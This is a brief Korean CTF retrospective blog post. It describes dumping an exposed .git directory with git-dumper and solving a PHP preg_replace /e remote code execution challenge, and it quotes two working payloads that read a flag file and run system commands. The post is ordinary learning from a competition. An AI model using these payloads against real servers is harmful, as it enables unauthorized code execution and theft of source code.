1. .git 이 존재하는 걸 알았지만 어떻게 해야할 지 몰랐다.
-> git-dumper로 덤프 뜨고 git log -p 로 로그를 훑어 본 뒤에, git checkout 원하는 커밋 해쉬값 하면 그때로 돌아간다.
참고/twoicefish-secu.tistory.com/106
Github Forensic 문제에 유용한 Git 명령어
1. 로그와 변경사항 보기 git log -p 각 커밋마다 수정된 파일의 내역을 보여준다. 2. 브랜치 변경 git checkout [Commit hash] git checkout commit 해쉬를 입력하고 파일 찾기를 진행하면된다.
twoicefish-secu.tistory.com
2. preg_replace RCE로 원하는 함수를 실행 시킬 수 있었는데, 내가 아는건 다 필터링 돼서 못풀었다.
Official : ?nic3=/CTF/e&bruh=show_source(glob("fl*")[0]);
show_source 와 glob 함수를 새로 알게 되었다.
다른 풀이 : bruh=$_GET[1](%27ls%27)&nic3=/a/e&1=system
다른 문제는 보지도 않아서..
'Hacking Note > Web' 카테고리의 다른 글
| Node JS prototype pollution to RCE / express-fileupload@1.1.6 + EJS (0) | 2020.09.07 |
|---|